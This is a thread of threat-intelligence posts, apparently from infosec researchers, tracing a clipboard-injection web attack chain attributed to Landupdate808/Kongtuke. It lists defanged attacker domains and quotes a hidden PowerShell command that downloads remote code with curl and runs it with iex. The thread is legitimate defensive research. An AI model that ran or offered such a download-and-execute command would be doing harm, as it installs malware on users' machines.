JacobLikely next #Landupdate808 / #Kongtuke infra:
rshank[.]com
Still was never able to get a payload from the last reported infra, vicrin[.]com
Well, I figured it out, thanks to some help by @rmceoin
Victim site
-->
rshank[.]com/metrics.js (Landupdate808 infra)
-->
cloudflare[.]com/cdn-cgi/trace (fingerprinting checks)
-->
hxxps[:]//rshank[.]com/js.php?device=[OS]&ip=[IP INFO]=&refferer=[REFERRER URL]=&browser=[BROWSER]&ua=[USER AGENT]&domain=[KONGTUKE INFRA]&loc=[COUNTRY CODE]=&is_ajax=1
Ctrl+C then copies
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//527newagain[.]top/1.php?s=527;iex $global:block.content
Not able to get the payload off of the curl command though, not sure if it's live.
cc @MalasadaTech figured you might be interested, this is a new tactic for them
MalasadaTechHOWZIT! I'm very interested. Thanks for sharing! Will reply in a private mention.
Randy@cyberamateur @MalasadaTech the
loc=VVM= in the URL means "location". It comes from the CloudFlare call. VVM= is base64 for US. So in your example it means United States location.@rmceoin @MalasadaTech good catch. Honestly noticed it and didn’t think anything of it, got the edit in with the change
Dusty@cyberamateur @rmceoin @MalasadaTech the payload is ta582, same thing that drops from SG non-domain joined chain
@GustyDusty @cyberamateur @MalasadaTech oh! I felt like the whole
blahblah.top /1.php ? s= format seemed familiar.
passwordispassword@cyberamateur @rmceoin @MalasadaTech
Has anyone followed this on VirusTotal? The HTTP responses documented in VT look like obfuscated code, maybe made to look like legit google developer code?
@cyberamateur @rmceoin @MalasadaTech Here's another question... what is the context around the curl command being copied? I see that Ctrl +C is mentioned, but what is the impetus for the user doing that?
I was thinking maybe a JS clipboard write or writeText method somewhere in the attack chain, but it looks like you may have identified the Ctrl+C somewhere?